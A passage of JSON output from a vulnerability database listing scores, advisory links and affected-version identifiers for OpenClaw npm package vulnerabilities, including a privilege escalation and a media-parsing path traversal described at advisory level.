                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hf68-49fm-59cq"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35639",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35639"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-device-pair-approve-scope-validation",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-device-pair-approve-scope-validation"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-r3v5-2grc-429h",
                    "reference_id": "GHSA-r3v5-2grc-429h",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-r3v5-2grc-429h"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "GHSA-r3v5-2grc-429h"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8aek-6dw1-tudj"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91812?format=api",
            "vulnerability_id": "VCID-8uzb-xmf8-hbca",
            "summary": "OpenClaw is vulnerable to Path Traversal through path validation bypass\nOpenClaw through 2026.3.23 (fixed in commit 4797bbc) contains a path traversal vulnerability in media parsing that allows attackers to read arbitrary files by bypassing path validation in the isLikelyLocalPath() and isValidMedia() functions. Attackers can exploit incomplete validation and the allowBareFilename bypass to reference files outside the intended application sandbox, resulting in disclosure of sensitive information including system files, environment files, and SSH keys.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-32846",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00027",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08194",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00027",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08191",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00027",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08208",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-32846"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/4797bbc5b96e2cca5532e43b58915c051746fe37",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-27T14:43:02Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/4797bbc5b96e2cca5532e43b58915c051746fe37"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/54642",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-27T14:43:02Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/54642"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f6pf-4gjx-c94r",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-27T14:43:02Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f6pf-4gjx-c94r"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32846",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32846"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-media-parsing-path-traversal-to-arbitrary-file-read",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-27T14:43:02Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-media-parsing-path-traversal-to-arbitrary-file-read"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-hggm-x7r9-mm7v",
                    "reference_id": "GHSA-hggm-x7r9-mm7v",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-hggm-x7r9-mm7v"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
